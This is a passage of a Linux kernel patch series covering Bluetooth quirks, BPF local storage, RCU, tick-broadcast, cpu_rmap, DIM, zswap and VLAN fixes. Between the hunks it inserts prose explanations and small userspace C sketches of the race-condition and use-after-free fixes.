++++ b/include/linux/sunrpc/svc_xprt.h
+@@ -23,7 +23,7 @@ struct svc_xprt_ops {
+ 	int		(*xpo_sendto)(struct svc_rqst *);
+ 	int		(*xpo_result_payload)(struct svc_rqst *, unsigned int,
+ 					      unsigned int);
+-	void		(*xpo_release_rqst)(struct svc_rqst *);
++	void		(*xpo_release_ctxt)(struct svc_xprt *xprt, void *ctxt);
+ 	void		(*xpo_detach)(struct svc_xprt *);
+ 	void		(*xpo_free)(struct svc_xprt *);
+ 	void		(*xpo_secure_port)(struct svc_rqst *rqstp);
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index 7a381fcef939d..b350d92136c8d 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -294,6 +294,21 @@ enum {
+ 	 * during the hdev->setup vendor callback.
+ 	 */
+ 	HCI_QUIRK_BROKEN_MWS_TRANSPORT_CONFIG,
++
++	/* When this quirk is set, max_page for local extended features
++	 * is set to 1, even if controller reports higher number. Some
++	 * controllers (e.g. RTL8723CS) report more pages, but they
++	 * don't actually support features declared there.
++	 */
++	HCI_QUIRK_BROKEN_LOCAL_EXT_FEATURES_PAGE_2,
++
++	/*
++	 * When this quirk is set, the HCI_OP_LE_SET_RPA_TIMEOUT command is
++	 * skipped during initialization. This is required for the Actions
++	 * Semiconductor ATS2851 based controllers, which erroneously claim
++	 * to support it.
++	 */
++	HCI_QUIRK_BROKEN_SET_RPA_TIMEOUT,
+ };
+ 
+ /* HCI device flags */
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index 768348008d0c9..123729c0e1ee1 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -235,7 +235,7 @@ struct bonding {
+ 	 */
+ 	spinlock_t mode_lock;
+ 	spinlock_t stats_lock;
+-	u8	 send_peer_notif;
++	u32	 send_peer_notif;
+ 	u8       igmp_retrans;
+ #ifdef CONFIG_PROC_FS
+ 	struct   proc_dir_entry *proc_entry;
+diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
+index 1fca6a88114ad..abc46f05762e6 100644
+--- a/include/net/ip_vs.h
++++ b/include/net/ip_vs.h
+@@ -549,8 +549,10 @@ struct ip_vs_conn {
+ 	 */
+ 	struct ip_vs_app        *app;           /* bound ip_vs_app object */
+ 	void                    *app_data;      /* Application private data */
+-	struct ip_vs_seq        in_seq;         /* incoming seq. struct */
+-	struct ip_vs_seq        out_seq;        /* outgoing seq. struct */
++	struct_group(sync_conn_opt,
++		struct ip_vs_seq  in_seq;       /* incoming seq. struct */
++		struct ip_vs_seq  out_seq;      /* outgoing seq. struct */
++	);
+ 
+ 	const struct ip_vs_pe	*pe;
+ 	char			*pe_data;
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 832a4a51de4d9..beb1b747fb09d 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2744,7 +2744,7 @@ static inline void sock_recv_cmsgs(struct msghdr *msg, struct sock *sk,
+ 		__sock_recv_cmsgs(msg, sk, skb);
+ 	else if (unlikely(sock_flag(sk, SOCK_TIMESTAMP)))
+ 		sock_write_timestamp(sk, skb->tstamp);
+-	else if (unlikely(sk->sk_stamp == SK_DEFAULT_STAMP))
++	else if (unlikely(sock_read_timestamp(sk) == SK_DEFAULT_STAMP))
+ 		sock_write_timestamp(sk, 0);
+ }
+ 
+diff --git a/include/uapi/asm-generic/fcntl.h b/include/uapi/asm-generic/fcntl.h
+index 1ecdb911add8d..80f37a0d40d7d 100644
+--- a/include/uapi/asm-generic/fcntl.h
++++ b/include/uapi/asm-generic/fcntl.h
+@@ -91,7 +91,6 @@
+ 
+ /* a horrid kludge trying to make sure that this will fail on old kernels */
+ #define O_TMPFILE (__O_TMPFILE | O_DIRECTORY)
+-#define O_TMPFILE_MASK (__O_TMPFILE | O_DIRECTORY | O_CREAT)      
+ 
+ #ifndef O_NDELAY
+ #define O_NDELAY	O_NONBLOCK
+diff --git a/kernel/bpf/bpf_local_storage.c b/kernel/bpf/bpf_local_storage.c
+index f27fa5ba7d722..d9d88a2cda5e5 100644
+--- a/kernel/bpf/bpf_local_storage.c
++++ b/kernel/bpf/bpf_local_storage.c
+@@ -51,11 +51,21 @@ owner_storage(struct bpf_local_storage_map *smap, void *owner)
+ 	return map->ops->map_owner_storage_ptr(owner);
+ }
+ 
++static bool selem_linked_to_storage_lockless(const struct bpf_local_storage_elem *selem)
++{
++	return !hlist_unhashed_lockless(&selem->snode);
++}
++
+ static bool selem_linked_to_storage(const struct bpf_local_storage_elem *selem)
+ {
+ 	return !hlist_unhashed(&selem->snode);
+ }
+ 
++static bool selem_linked_to_map_lockless(const struct bpf_local_storage_elem *selem)
++{
++	return !hlist_unhashed_lockless(&selem->map_node);
++}
++
+ static bool selem_linked_to_map(const struct bpf_local_storage_elem *selem)
+ {
+ 	return !hlist_unhashed(&selem->map_node);
+@@ -165,7 +175,7 @@ static void __bpf_selem_unlink_storage(struct bpf_local_storage_elem *selem,
+ 	bool free_local_storage = false;
+ 	unsigned long flags;
+ 
+-	if (unlikely(!selem_linked_to_storage(selem)))
++	if (unlikely(!selem_linked_to_storage_lockless(selem)))
+ 		/* selem has already been unlinked from sk */
+ 		return;
+ 
+@@ -199,7 +209,7 @@ void bpf_selem_unlink_map(struct bpf_local_storage_elem *selem)
+ 	struct bpf_local_storage_map_bucket *b;
+ 	unsigned long flags;
+ 
+-	if (unlikely(!selem_linked_to_map(selem)))
++	if (unlikely(!selem_linked_to_map_lockless(selem)))
+ 		/* selem has already be unlinked from smap */
+ 		return;
+ 
+@@ -410,7 +420,7 @@ bpf_local_storage_update(void *owner, struct bpf_local_storage_map *smap,
+ 		err = check_flags(old_sdata, map_flags);
+ 		if (err)
+ 			return ERR_PTR(err);
+-		if (old_sdata && selem_linked_to_storage(SELEM(old_sdata))) {
++		if (old_sdata && selem_linked_to_storage_lockless(SELEM(old_sdata))) {
+ 			copy_map_value_locked(&smap->map, old_sdata->data,
+ 					      value, false);
+ 			return old_sdata;
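
The _lockless variants differ from the plain ones only in how the pprev
pointer is loaded (simplified from include/linux/list.h):

	static inline int hlist_unhashed(const struct hlist_node *h)
	{
		return !h->pprev;		/* callers hold the bucket lock */
	}

	/* Safe to call outside the lock: READ_ONCE() forces a single,
	 * tear-free load and marks the intentional data race for KCSAN. */
	static inline int hlist_unhashed_lockless(const struct hlist_node *h)
	{
		return !READ_ONCE(h->pprev);
	}
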
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 8726161076134..322a2ae8f88b0 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -15133,6 +15133,10 @@ BTF_ID(func, migrate_enable)
+ #if !defined CONFIG_PREEMPT_RCU && !defined CONFIG_TINY_RCU
+ BTF_ID(func, rcu_read_unlock_strict)
+ #endif
++#if defined(CONFIG_DEBUG_PREEMPT) || defined(CONFIG_TRACE_PREEMPT_TOGGLE)
++BTF_ID(func, preempt_count_add)
++BTF_ID(func, preempt_count_sub)
++#endif
+ BTF_SET_END(btf_id_deny)
+ 
+ static int check_attach_btf_id(struct bpf_verifier_env *env)
+diff --git a/kernel/rcu/refscale.c b/kernel/rcu/refscale.c
+index 435c884c02b5c..d49a9d66e0000 100644
+--- a/kernel/rcu/refscale.c
++++ b/kernel/rcu/refscale.c
+@@ -795,7 +795,7 @@ ref_scale_cleanup(void)
+ static int
+ ref_scale_shutdown(void *arg)
+ {
+-	wait_event(shutdown_wq, shutdown_start);
++	wait_event_idle(shutdown_wq, shutdown_start);
+ 
+ 	smp_mb(); // Wake before output.
+ 	ref_scale_cleanup();
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index 60732264a7d0b..e25321dbb068e 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -800,9 +800,11 @@ static int rcu_print_task_exp_stall(struct rcu_node *rnp)
+ 	int ndetected = 0;
+ 	struct task_struct *t;
+ 
+-	if (!READ_ONCE(rnp->exp_tasks))
+-		return 0;
+ 	raw_spin_lock_irqsave_rcu_node(rnp, flags);
++	if (!rnp->exp_tasks) {
++		raw_spin_unlock_irqrestore_rcu_node(rnp, flags);
++		return 0;
++	}
+ 	t = list_entry(rnp->exp_tasks->prev,
+ 		       struct task_struct, rcu_node_entry);
+ 	list_for_each_entry_continue(t, &rnp->blkd_tasks, rcu_node_entry) {
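
This is the classic check-then-use race: rnp->exp_tasks can be cleared
and the task list mutated between the old unlocked check and the walk,
so the check has to move under the node lock. Schematically:

	/* before: pointer may be stale by the time the list is walked */
	if (!READ_ONCE(rnp->exp_tasks))
		return 0;
	raw_spin_lock_irqsave_rcu_node(rnp, flags);

	/* after: the same check, made stable by holding rnp->lock */
	raw_spin_lock_irqsave_rcu_node(rnp, flags);
	if (!rnp->exp_tasks) {
		raw_spin_unlock_irqrestore_rcu_node(rnp, flags);
		return 0;
	}
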
+diff --git a/kernel/time/tick-broadcast.c b/kernel/time/tick-broadcast.c
+index f7fe6fe361731..0916cc9adb828 100644
+--- a/kernel/time/tick-broadcast.c
++++ b/kernel/time/tick-broadcast.c
+@@ -35,14 +35,15 @@ static __cacheline_aligned_in_smp DEFINE_RAW_SPINLOCK(tick_broadcast_lock);
+ #ifdef CONFIG_TICK_ONESHOT
+ static DEFINE_PER_CPU(struct clock_event_device *, tick_oneshot_wakeup_device);
+ 
+-static void tick_broadcast_setup_oneshot(struct clock_event_device *bc);
++static void tick_broadcast_setup_oneshot(struct clock_event_device *bc, bool from_periodic);
+ static void tick_broadcast_clear_oneshot(int cpu);
+ static void tick_resume_broadcast_oneshot(struct clock_event_device *bc);
+ # ifdef CONFIG_HOTPLUG_CPU
+ static void tick_broadcast_oneshot_offline(unsigned int cpu);
+ # endif
+ #else
+-static inline void tick_broadcast_setup_oneshot(struct clock_event_device *bc) { BUG(); }
++static inline void
++tick_broadcast_setup_oneshot(struct clock_event_device *bc, bool from_periodic) { BUG(); }
+ static inline void tick_broadcast_clear_oneshot(int cpu) { }
+ static inline void tick_resume_broadcast_oneshot(struct clock_event_device *bc) { }
+ # ifdef CONFIG_HOTPLUG_CPU
+@@ -264,7 +265,7 @@ int tick_device_uses_broadcast(struct clock_event_device *dev, int cpu)
+ 		if (tick_broadcast_device.mode == TICKDEV_MODE_PERIODIC)
+ 			tick_broadcast_start_periodic(bc);
+ 		else
+-			tick_broadcast_setup_oneshot(bc);
++			tick_broadcast_setup_oneshot(bc, false);
+ 		ret = 1;
+ 	} else {
+ 		/*
+@@ -500,7 +501,7 @@ void tick_broadcast_control(enum tick_broadcast_mode mode)
+ 			if (tick_broadcast_device.mode == TICKDEV_MODE_PERIODIC)
+ 				tick_broadcast_start_periodic(bc);
+ 			else
+-				tick_broadcast_setup_oneshot(bc);
++				tick_broadcast_setup_oneshot(bc, false);
+ 		}
+ 	}
+ out:
+@@ -1016,48 +1017,101 @@ static inline ktime_t tick_get_next_period(void)
+ /**
+  * tick_broadcast_setup_oneshot - setup the broadcast device
+  */
+-static void tick_broadcast_setup_oneshot(struct clock_event_device *bc)
++static void tick_broadcast_setup_oneshot(struct clock_event_device *bc,
++					 bool from_periodic)
+ {
+ 	int cpu = smp_processor_id();
++	ktime_t nexttick = 0;
+ 
+ 	if (!bc)
+ 		return;
+ 
+-	/* Set it up only once ! */
+-	if (bc->event_handler != tick_handle_oneshot_broadcast) {
+-		int was_periodic = clockevent_state_periodic(bc);
+-
+-		bc->event_handler = tick_handle_oneshot_broadcast;
+-
++	/*
++	 * When the broadcast device was switched to oneshot by the first
++	 * CPU handling the NOHZ change, the other CPUs will reach this
++	 * code via hrtimer_run_queues() -> tick_check_oneshot_change()
++	 * too. Set up the broadcast device only once!
++	 */
++	if (bc->event_handler == tick_handle_oneshot_broadcast) {
+ 		/*
+-		 * We must be careful here. There might be other CPUs
+-		 * waiting for periodic broadcast. We need to set the
+-		 * oneshot_mask bits for those and program the
+-		 * broadcast device to fire.
++		 * The CPU which switched from periodic to oneshot mode
++		 * set the broadcast oneshot bit for all other CPUs which
++		 * are in the general (periodic) broadcast mask to ensure
++		 * that CPUs which wait for the periodic broadcast are
++		 * woken up.
++		 *
++		 * Clear the bit for the local CPU as the set bit would
++		 * prevent the first tick_broadcast_enter() after this CPU
++		 * switched to oneshot state to program the broadcast
++		 * device.
++		 *
++		 * This code can also be reached via tick_broadcast_control(),
++		 * but this cannot avoid the tick_broadcast_clear_oneshot()
++		 * as that would break the periodic to oneshot transition of
++		 * secondary CPUs. But that's harmless as the below only
++		 * clears already cleared bits.
+ 		 */
++		tick_broadcast_clear_oneshot(cpu);
++		return;
++	}
++
++
++	bc->event_handler = tick_handle_oneshot_broadcast;
++	bc->next_event = KTIME_MAX;
++
++	/*
++	 * When the tick mode is switched from periodic to oneshot it must
++	 * be ensured that CPUs which are waiting for periodic broadcast
++	 * get their wake-up at the next tick.  This is achieved by ORing
++	 * tick_broadcast_mask into tick_broadcast_oneshot_mask.
++	 *
++	 * For other callers, e.g. broadcast device replacement,
++	 * tick_broadcast_oneshot_mask must not be touched as this would
++	 * set bits for CPUs which are already NOHZ, but not idle. Their
++	 * next tick_broadcast_enter() would observe the bit set and fail
++	 * to update the expiry time and the broadcast event device.
++	 */
++	if (from_periodic) {
+ 		cpumask_copy(tmpmask, tick_broadcast_mask);
++		/* Remove the local CPU as it is obviously not idle */
+ 		cpumask_clear_cpu(cpu, tmpmask);
+-		cpumask_or(tick_broadcast_oneshot_mask,
+-			   tick_broadcast_oneshot_mask, tmpmask);
++		cpumask_or(tick_broadcast_oneshot_mask, tick_broadcast_oneshot_mask, tmpmask);
+ 
+-		if (was_periodic && !cpumask_empty(tmpmask)) {
+-			ktime_t nextevt = tick_get_next_period();
++		/*
++		 * Ensure that the oneshot broadcast handler will wake the
++		 * CPUs which are still waiting for periodic broadcast.
++		 */
++		nexttick = tick_get_next_period();
++		tick_broadcast_init_next_event(tmpmask, nexttick);
+ 
+-			clockevents_switch_state(bc, CLOCK_EVT_STATE_ONESHOT);
+-			tick_broadcast_init_next_event(tmpmask, nextevt);
+-			tick_broadcast_set_event(bc, cpu, nextevt);
+-		} else
+-			bc->next_event = KTIME_MAX;
+-	} else {
+ 		/*
+-		 * The first cpu which switches to oneshot mode sets
+-		 * the bit for all other cpus which are in the general
+-		 * (periodic) broadcast mask. So the bit is set and
+-		 * would prevent the first broadcast enter after this
+-		 * to program the bc device.
++		 * If the underlying broadcast clock event device is
++		 * already in oneshot state, then there is nothing to do.
++		 * The device was already armed for the next tick
++		 * in tick_handle_broadcast_periodic()
+ 		 */
+-		tick_broadcast_clear_oneshot(cpu);
++		if (clockevent_state_oneshot(bc))
++			return;
+ 	}
++
++	/*
++	 * When switching from periodic to oneshot mode arm the broadcast
++	 * device for the next tick.
++	 *
++	 * If the broadcast device has been replaced in oneshot mode and
++	 * the oneshot broadcast mask is not empty, then arm it to expire
++	 * immediately in order to reevaluate the next expiring timer.
++	 * @nexttick is 0 and therefore in the past which will cause the
++	 * clockevent code to force an event.
++	 *
++	 * For both cases the programming can be avoided when the oneshot
++	 * broadcast mask is empty.
++	 *
++	 * tick_broadcast_set_event() implicitly switches the broadcast
++	 * device to oneshot state.
++	 */
++	if (!cpumask_empty(tick_broadcast_oneshot_mask))
++		tick_broadcast_set_event(bc, cpu, nexttick);
+ }
+ 
+ /*
+@@ -1066,14 +1120,16 @@ static void tick_broadcast_setup_oneshot(struct clock_event_device *bc)
+ void tick_broadcast_switch_to_oneshot(void)
+ {
+ 	struct clock_event_device *bc;
++	enum tick_device_mode oldmode;
+ 	unsigned long flags;
+ 
+ 	raw_spin_lock_irqsave(&tick_broadcast_lock, flags);
+ 
++	oldmode = tick_broadcast_device.mode;
+ 	tick_broadcast_device.mode = TICKDEV_MODE_ONESHOT;
+ 	bc = tick_broadcast_device.evtdev;
+ 	if (bc)
+-		tick_broadcast_setup_oneshot(bc);
++		tick_broadcast_setup_oneshot(bc, oldmode == TICKDEV_MODE_PERIODIC);
+ 
+ 	raw_spin_unlock_irqrestore(&tick_broadcast_lock, flags);
+ }
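
The tick-broadcast change above threads a from_periodic flag into tick_broadcast_setup_oneshot() so the function can tell a genuine periodic-to-oneshot switch apart from a broadcast-device replacement; the caller snapshots the old mode before overwriting it. A minimal userspace sketch of that capture-then-pass pattern follows; all names are illustrative stand-ins, not the kernel code.

#include <stdio.h>

enum tick_mode { MODE_PERIODIC, MODE_ONESHOT };

static enum tick_mode cur_mode = MODE_PERIODIC;

/* Illustrative stand-in for tick_broadcast_setup_oneshot(). */
static void setup_oneshot(int from_periodic)
{
	if (from_periodic)
		printf("arming wakeups for CPUs still waiting on the periodic tick\n");
	else
		printf("device replacement: leave the oneshot mask alone\n");
}

static void switch_to_oneshot(void)
{
	/* Record the old mode *before* overwriting it, then pass the
	 * distinction down instead of guessing it later from device state. */
	enum tick_mode oldmode = cur_mode;

	cur_mode = MODE_ONESHOT;
	setup_oneshot(oldmode == MODE_PERIODIC);
}

int main(void)
{
	switch_to_oneshot();	/* first call: real periodic -> oneshot switch */
	switch_to_oneshot();	/* second call: already oneshot */
	return 0;
}
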
+diff --git a/kernel/trace/rethook.c b/kernel/trace/rethook.c
+index 32c3dfdb4d6a7..60f6cb2b486bf 100644
+--- a/kernel/trace/rethook.c
++++ b/kernel/trace/rethook.c
+@@ -288,7 +288,7 @@ unsigned long rethook_trampoline_handler(struct pt_regs *regs,
+ 	 * These loops must be protected from rethook_free_rcu() because those
+ 	 * are accessing 'rhn->rethook'.
+ 	 */
+-	preempt_disable();
++	preempt_disable_notrace();
+ 
+ 	/*
+ 	 * Run the handler on the shadow stack. Do not unlink the list here because
+@@ -321,7 +321,7 @@ unsigned long rethook_trampoline_handler(struct pt_regs *regs,
+ 		first = first->next;
+ 		rethook_recycle(rhn);
+ 	}
+-	preempt_enable();
++	preempt_enable_notrace();
+ 
+ 	return correct_ret_addr;
+ }
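
The rethook fix swaps preempt_disable()/preempt_enable() for their _notrace variants: the trampoline handler runs inside the tracing machinery itself, and the traced preempt helpers could re-trigger tracing and recurse. There is no direct userspace equivalent, but a loose analogue of keeping instrumentation out of its own hot path is a per-thread reentrancy guard, sketched below with illustrative names.

#include <stdio.h>

static _Thread_local int in_trace_handler;

/* Instrumentation hook that must never instrument itself. */
static void trace_event(const char *what)
{
	if (in_trace_handler)
		return;		/* already inside the handler: do not recurse */

	in_trace_handler = 1;
	printf("trace: %s\n", what);	/* pretend this path is itself traceable */
	in_trace_handler = 0;
}

int main(void)
{
	trace_event("function entry");
	return 0;
}
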
+diff --git a/lib/cpu_rmap.c b/lib/cpu_rmap.c
+index f08d9c56f712e..e77f12bb3c774 100644
+--- a/lib/cpu_rmap.c
++++ b/lib/cpu_rmap.c
+@@ -232,7 +232,8 @@ void free_irq_cpu_rmap(struct cpu_rmap *rmap)
+ 
+ 	for (index = 0; index < rmap->used; index++) {
+ 		glue = rmap->obj[index];
+-		irq_set_affinity_notifier(glue->notify.irq, NULL);
++		if (glue)
++			irq_set_affinity_notifier(glue->notify.irq, NULL);
+ 	}
+ 
+ 	cpu_rmap_put(rmap);
+@@ -268,6 +269,7 @@ static void irq_cpu_rmap_release(struct kref *ref)
+ 		container_of(ref, struct irq_glue, notify.kref);
+ 
+ 	cpu_rmap_put(glue->rmap);
++	glue->rmap->obj[glue->index] = NULL;
+ 	kfree(glue);
+ }
+ 
+@@ -297,6 +299,7 @@ int irq_cpu_rmap_add(struct cpu_rmap *rmap, int irq)
+ 	rc = irq_set_affinity_notifier(irq, &glue->notify);
+ 	if (rc) {
+ 		cpu_rmap_put(glue->rmap);
++		rmap->obj[glue->index] = NULL;
+ 		kfree(glue);
+ 	}
+ 	return rc;
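
The cpu_rmap fix clears rmap->obj[glue->index] when a glue object is released, and free_irq_cpu_rmap() now tolerates NULL slots, so teardown never dereferences a pointer to memory that was already freed on another path. The general pattern, as a small self-contained sketch:

#include <stdio.h>
#include <stdlib.h>

#define NSLOTS 4

static void *registry[NSLOTS];

static void release_slot(int i)
{
	free(registry[i]);
	registry[i] = NULL;	/* clear the slot so teardown can skip it */
}

static void teardown(void)
{
	for (int i = 0; i < NSLOTS; i++) {
		if (registry[i])	/* NULL slots were already released */
			free(registry[i]);
	}
}

int main(void)
{
	for (int i = 0; i < NSLOTS; i++)
		registry[i] = malloc(16);

	release_slot(2);	/* early release, e.g. on an error path */
	teardown();		/* must not double-free slot 2 */
	return 0;
}
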
+diff --git a/lib/dim/dim.c b/lib/dim/dim.c
+index 38045d6d05381..e89aaf07bde50 100644
+--- a/lib/dim/dim.c
++++ b/lib/dim/dim.c
+@@ -54,7 +54,7 @@ void dim_park_tired(struct dim *dim)
+ }
+ EXPORT_SYMBOL(dim_park_tired);
+ 
+-void dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
++bool dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
+ 		    struct dim_stats *curr_stats)
+ {
+ 	/* u32 holds up to 71 minutes, should be enough */
+@@ -66,7 +66,7 @@ void dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
+ 			     start->comp_ctr);
+ 
+ 	if (!delta_us)
+-		return;
++		return false;
+ 
+ 	curr_stats->ppms = DIV_ROUND_UP(npkts * USEC_PER_MSEC, delta_us);
+ 	curr_stats->bpms = DIV_ROUND_UP(nbytes * USEC_PER_MSEC, delta_us);
+@@ -79,5 +79,6 @@ void dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
+ 	else
+ 		curr_stats->cpe_ratio = 0;
+ 
++	return true;
+ }
+ EXPORT_SYMBOL(dim_calc_stats);
+diff --git a/lib/dim/net_dim.c b/lib/dim/net_dim.c
+index 53f6b9c6e9366..4e32f7aaac86c 100644
+--- a/lib/dim/net_dim.c
++++ b/lib/dim/net_dim.c
+@@ -227,7 +227,8 @@ void net_dim(struct dim *dim, struct dim_sample end_sample)
+ 				  dim->start_sample.event_ctr);
+ 		if (nevents < DIM_NEVENTS)
+ 			break;
+-		dim_calc_stats(&dim->start_sample, &end_sample, &curr_stats);
++		if (!dim_calc_stats(&dim->start_sample, &end_sample, &curr_stats))
++			break;
+ 		if (net_dim_decision(&curr_stats, dim)) {
+ 			dim->state = DIM_APPLY_NEW_PROFILE;
+ 			schedule_work(&dim->work);
+diff --git a/lib/dim/rdma_dim.c b/lib/dim/rdma_dim.c
+index 15462d54758d3..88f7794867078 100644
+--- a/lib/dim/rdma_dim.c
++++ b/lib/dim/rdma_dim.c
+@@ -88,7 +88,8 @@ void rdma_dim(struct dim *dim, u64 completions)
+ 		nevents = curr_sample->event_ctr - dim->start_sample.event_ctr;
+ 		if (nevents < DIM_NEVENTS)
+ 			break;
+-		dim_calc_stats(&dim->start_sample, curr_sample, &curr_stats);
++		if (!dim_calc_stats(&dim->start_sample, curr_sample, &curr_stats))
++			break;
+ 		if (rdma_dim_decision(&curr_stats, dim)) {
+ 			dim->state = DIM_APPLY_NEW_PROFILE;
+ 			schedule_work(&dim->work);
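
dim_calc_stats() previously returned void, so when two samples carried the same timestamp (delta_us == 0) it bailed out early and net_dim()/rdma_dim() went on to make a moderation decision from stale or uninitialized dim_stats. Returning bool lets both callers skip the decision for that window. The shape of the fix, reduced to a sketch with illustrative names:

#include <stdbool.h>
#include <stdio.h>

struct stats { unsigned int ppms; };

/* Returns false when the sampling window is empty and no valid
 * statistics can be derived (mirrors the dim_calc_stats() change). */
static bool calc_stats(unsigned int delta_us, unsigned int npkts,
		       struct stats *out)
{
	if (!delta_us)
		return false;	/* caller must not consume *out */

	out->ppms = npkts * 1000u / delta_us;
	return true;
}

int main(void)
{
	struct stats s;

	if (calc_stats(0, 500, &s))
		printf("decide with ppms=%u\n", s.ppms);
	else
		printf("empty window, skip this decision\n");
	return 0;
}
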
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 9fe25ce9937b8..b72268848ade1 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5338,15 +5338,9 @@ int mas_empty_area(struct ma_state *mas, unsigned long min,
+ 
+ 	mt = mte_node_type(mas->node);
+ 	pivots = ma_pivots(mas_mn(mas), mt);
+-	if (offset)
+-		mas->min = pivots[offset - 1] + 1;
+-
+-	if (offset < mt_pivots[mt])
+-		mas->max = pivots[offset];
+-
+-	if (mas->index < mas->min)
+-		mas->index = mas->min;
+-
++	min = mas_safe_min(mas, pivots, offset);
++	if (mas->index < min)
++		mas->index = min;
+ 	mas->last = mas->index + size - 1;
+ 	return 0;
+ }
+diff --git a/mm/zswap.c b/mm/zswap.c
+index 2d48fd59cc7ab..708b82dbe8a46 100644
+--- a/mm/zswap.c
++++ b/mm/zswap.c
+@@ -1002,6 +1002,22 @@ static int zswap_writeback_entry(struct zpool *pool, unsigned long handle)
+ 		goto fail;
+ 
+ 	case ZSWAP_SWAPCACHE_NEW: /* page is locked */
++		/*
++		 * Having a local reference to the zswap entry doesn't exclude
++		 * swapping from invalidating and recycling the swap slot. Once
++		 * the swapcache is secured against concurrent swapping to and
++		 * from the slot, recheck that the entry is still current before
++		 * writing.
++		 */
++		spin_lock(&tree->lock);
++		if (zswap_rb_search(&tree->rbroot, entry->offset) != entry) {
++			spin_unlock(&tree->lock);
++			delete_from_swap_cache(page_folio(page));
++			ret = -ENOMEM;
++			goto fail;
++		}
++		spin_unlock(&tree->lock);
++
+ 		/* decompress */
+ 		acomp_ctx = raw_cpu_ptr(entry->pool->acomp_ctx);
+ 		dlen = PAGE_SIZE;
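
The zswap hunk is the classic recheck-under-the-lock pattern: holding a local reference to the entry does not stop swapping from invalidating and recycling the slot, so once the swapcache page is secured the code re-takes the tree lock and verifies the entry is still the one indexed at that offset before writing it back. A compact sketch of the pattern, with illustrative names and a trivial lookup standing in for the rbtree:

#include <pthread.h>
#include <stdio.h>

struct entry { int offset; };

static pthread_mutex_t tree_lock = PTHREAD_MUTEX_INITIALIZER;
static struct entry *tree_slot;		/* stand-in for the rbtree */

static struct entry *lookup(int offset)
{
	return (tree_slot && tree_slot->offset == offset) ? tree_slot : NULL;
}

static int writeback(struct entry *e)
{
	/* ... slow preparation happens here, without the lock ... */

	pthread_mutex_lock(&tree_lock);
	if (lookup(e->offset) != e) {	/* entry was recycled meanwhile */
		pthread_mutex_unlock(&tree_lock);
		return -1;		/* abort instead of writing stale data */
	}
	pthread_mutex_unlock(&tree_lock);

	printf("entry still current, safe to write back\n");
	return 0;
}

int main(void)
{
	struct entry e = { .offset = 42 };

	tree_slot = &e;
	return writeback(&e) ? 1 : 0;
}
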
+diff --git a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c
+index 07e86d03d4bae..d3e511e1eba8a 100644
+--- a/net/8021q/vlan_dev.c
++++ b/net/8021q/vlan_dev.c
+@@ -108,8 +108,8 @@ static netdev_tx_t vlan_dev_hard_start_xmit(struct sk_buff *skb,
+ 	 * NOTE: THIS ASSUMES DIX ETHERNET, SPECIFICALLY NOT SUPPORTING
+ 	 * OTHER THINGS LIKE FDDI/TokenRing/802.3 SNAPs...
+ 	 */
+-	if (veth->h_vlan_proto != vlan->vlan_proto ||
+-	    vlan->flags & VLAN_FLAG_REORDER_HDR) {
++	if (vlan->flags & VLAN_FLAG_REORDER_HDR ||
++	    veth->h_vlan_proto != vlan->vlan_proto) {
+ 		u16 vlan_tci;
+ 		vlan_tci = vlan->vlan_id;
+ 		vlan_tci |= vlan_dev_get_egress_qos_mask(dev, skb->priority);
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 42a3a19b111e3..21416ccc30ab2 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -881,8 +881,13 @@ static u8 hci_cc_read_local_ext_features(struct hci_dev *hdev, void *data,
+ 	if (rp->status)
+ 		return rp->status;
+ 
+-	if (hdev->max_page < rp->max_page)
+-		hdev->max_page = rp->max_page;
++	if (hdev->max_page < rp->max_page) {
++		if (test_bit(HCI_QUIRK_BROKEN_LOCAL_EXT_FEATURES_PAGE_2,
++			     &hdev->quirks))
++			bt_dev_warn(hdev, "broken local ext features page 2");
++		else
++			hdev->max_page = rp->max_page;
++	}
+ 
+ 	if (rp->page < HCI_MAX_PAGES)
+ 		memcpy(hdev->features[rp->page], rp->features, 8);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 9361fb3685cc7..e8b78104a4071 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -4075,7 +4075,8 @@ static int hci_le_set_rpa_timeout_sync(struct hci_dev *hdev)
+ {
+ 	__le16 timeout = cpu_to_le16(hdev->rpa_timeout);
+ 
+-	if (!(hdev->commands[35] & 0x04))
++	if (!(hdev->commands[35] & 0x04) ||
++	    test_bit(HCI_QUIRK_BROKEN_SET_RPA_TIMEOUT, &hdev->quirks))
+ 		return 0;
+ 
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_SET_RPA_TIMEOUT,
+@@ -4515,6 +4516,9 @@ static const struct {
+ 			 "HCI Set Event Filter command not supported."),
+ 	HCI_QUIRK_BROKEN(ENHANCED_SETUP_SYNC_CONN,
+ 			 "HCI Enhanced Setup Synchronous Connection command is "
++			 "advertised, but not supported."),
++	HCI_QUIRK_BROKEN(SET_RPA_TIMEOUT,
++			 "HCI LE Set Random Private Address Timeout command is "
+ 			 "advertised, but not supported.")
+ };
+ 
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index e62dadad81b31..ee8f806534dfb 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -4694,7 +4694,6 @@ static inline int l2cap_disconnect_rsp(struct l2cap_conn *conn,
+ 
